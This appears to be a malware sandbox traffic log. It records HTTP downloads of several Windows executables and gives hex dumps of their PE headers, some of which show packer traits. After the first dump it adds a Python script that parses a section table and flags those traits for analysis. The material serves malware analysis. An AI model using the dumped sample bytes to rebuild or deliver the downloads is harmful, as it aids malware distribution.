                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:48:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 08 Mar 2025 14:09:28 GMTETag: "1df200-62fd54987adb0"Accept-Ranges: bytesContent-Length: 1962496Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 f0 4d 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4e 00 00 04 00 00 54 3d 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 d9 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 d9 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2c 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6d 70 71 6d 62 61 67 00 e0 1a 00 00 00 33 00 00 de 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6e 63 66 62 73 62 69 00 10 00 00 00 e0 4d 00 00 04 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4d 00 00 22 00 00 00 d0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
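The "Data Raw" bytes of the response above are the first 0x400 bytes of the 1962496-byte download, which is enough to read the complete section table: seven sections named "   " (three spaces), ".rsrc", ".idata  ", eight spaces, "zmpqmbag", "jncfbsbi" and ".taggant", an entry point of 0x4df000 inside the last of them, and a last section whose raw data ends at 0x1df200 = 1962496, the Content-Length (the first hex field of the Apache ETag, 1df200, is the same size). The script below is an added example, not code from the Joe Sandbox report: it rebuilds a PE32 header with struct.pack from exactly those section-table and entry-point values (every other header field is a zero placeholder, labelled as such), parses it the way a loader would, and runs the checks an analyst applies to a packed dropper: whitespace or non-printable section names, sections that are both writable and executable, a section that is almost empty on disk but large in memory (the unpacking target), an entry point outside the first section, and whether the declared section layout accounts for the whole transfer (an overlay or a truncated download would show up here).

```python
"""Parse a PE32 section table and flag packer-style artefacts.

Added example, not part of the Joe Sandbox report: SECTIONS_FROM_REPORT and
ENTRY_POINT_FROM_REPORT are transcribed from the section table and
AddressOfEntryPoint in the report's first "Data Raw" dump; the DOS stub,
timestamp and the remaining optional-header fields are zero placeholders.
"""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# (Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
#  Characteristics).  The first name is three spaces, a NUL, four spaces,
#  exactly as the dump shows it; tools display it as "   ".
SECTIONS_FROM_REPORT = [
    (b"   \0    ", 0x0006C000, 0x00001000, 0x0002D600, 0x00001000, 0xE0000040),
    (b".rsrc",     0x00000388, 0x0006D000, 0x00000400, 0x0002E600, 0xC0000040),
    (b".idata  ",  0x00001000, 0x0006E000, 0x00000200, 0x0002EA00, 0xC0000040),
    (b"        ",  0x002C1000, 0x0006F000, 0x00000200, 0x0002EC00, 0xE0000040),
    (b"zmpqmbag",  0x001AE000, 0x00330000, 0x001ADE00, 0x0002EE00, 0xE0000040),
    (b"jncfbsbi",  0x00001000, 0x004DE000, 0x00000400, 0x001DCC00, 0xE0000040),
    (b".taggant",  0x00003000, 0x004DF000, 0x00002200, 0x001DD000, 0xE0000040),
]
ENTRY_POINT_FROM_REPORT = 0x4DF000     # AddressOfEntryPoint in the same dump
CONTENT_LENGTH_FROM_REPORT = 1962496   # Content-Length of that response


def build_header(sections, entry_point):
    """Assemble DOS header, PE signature, COFF header, PE32 optional header
    and section table.  Only the fields parse_sections() reads are real."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 224                      # PE32 optional header, 16 data dirs
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 14, 29, 0, 0, 0, entry_point, 0, 0)
    opt = opt.ljust(opt_size, b"\0")    # placeholder for the remaining fields
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
        for n, vs, va, rs, rp, ch in sections)
    return dos + b"PE\0\0" + coff + opt + table


def parse_sections(data):
    """Walk MZ -> e_lfanew -> PE -> COFF -> section table; return (entry point, sections)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(num_sections):
        raw = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": raw[0].split(b"\0", 1)[0], "vsize": raw[1],
                         "vaddr": raw[2], "rawsize": raw[3], "rawptr": raw[4],
                         "flags": raw[9]})
    return entry_point, sections


def audit(entry_point, sections, content_length):
    """Return (findings, expected file size) from the packer checks."""
    findings = []
    for idx, s in enumerate(sections):
        name = s["name"]
        if name != name.strip() or not all(0x21 <= b < 0x7F for b in name):
            findings.append(f"whitespace/non-printable section name {name!r}")
        if s["flags"] & IMAGE_SCN_MEM_WRITE and s["flags"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {name!r} is writable and executable")
        if s["vsize"] > 16 * max(s["rawsize"], 1):
            findings.append(f"section {name!r} is mostly empty on disk "
                            f"(raw {s['rawsize']:#x}, virtual {s['vsize']:#x})")
        span = max(s["vsize"], s["rawsize"])
        if idx and s["vaddr"] <= entry_point < s["vaddr"] + span:
            findings.append(f"entry point {entry_point:#x} lies in {name!r}, "
                            f"section {idx + 1} of {len(sections)}")
    expected = max(s["rawptr"] + s["rawsize"] for s in sections)
    if content_length > expected:
        findings.append(f"{content_length - expected} bytes of overlay after the last section")
    elif content_length < expected:
        findings.append("truncated: section table points past Content-Length")
    return findings, expected


if __name__ == "__main__":
    ep, secs = parse_sections(build_header(SECTIONS_FROM_REPORT, ENTRY_POINT_FROM_REPORT))
    for finding in audit(ep, secs, CONTENT_LENGTH_FROM_REPORT)[0]:
        print(finding)
```

On a real download the same checks run against the file on disk; here the header is rebuilt from the dump, so the point is the layout: the blank-named section at RVA 0x6f000 is 0x2c1000 bytes in memory but 0x200 on disk, the entry point sits in the seventh section, five of seven sections are writable and executable, and the last section's raw end lands exactly on the Content-Length, so there is no overlay to carve.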
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 08 Mar 2025 13:50:38 GMTETag: "1413e6-62fd506315261"Accept-Ranges: bytesContent-Length: 1315814Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 11 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 68 09 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 
a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 09 01 00 00 00 10 00 00 0a 01 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 10 11 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 16:22:33 GMTETag: "5b000-62fc307a5c12a"Accept-Ranges: bytesContent-Length: 372736Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1f 51 ff ad 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 22 00 00 00 08 00 00 00 00 00 00 66 3b 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 3b 00 00 4f 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 80 3a 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 20 00 00 00 20 00 00 00 22 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 53 53 00 00 00 00 00 82 05 00 00 a0 00 00 00 82 05 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 12:54:44 GMTETag: "1f8e00-62fc020741cbc"Accept-Ranges: bytesContent-Length: 2067968Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 ae 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 f5 e9 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 f0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 00 06 00 00 02 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 20 06 00 00 02 00 00 00 04 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 7a 68 65 68 77 6d 63 00 70 19 00 00 f0 2f 00 00 62 19 00 00 06 06 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 72 6f 65 6c 78 6c 6f 61 00 10 00 00 00 60 49 00 00 04 00 00 00 68 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 49 00 00 22 00 00 00 6c 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 11:00:14 GMTETag: "37ee8e-62faa69169064"Accept-Ranges: bytesContent-Length: 3665550Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 14 00 00 04 00 00 e3 1f 38 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 d8 52 05 00 00 00 00 00 00 00 00 00 3e b9 37 00 50 35 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 
9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d8 52 05 00 00 40 0f 00 00 54 05 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 a0 14 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 23:40:43 GMTETag: "6b400-62fc9269d5733"Accept-Ranges: bytesContent-Length: 439296Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 24 13 cb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 b7 9f 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c4 45 00 00 d8 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 10 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ea f0 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 72 48 01 00 00 10 
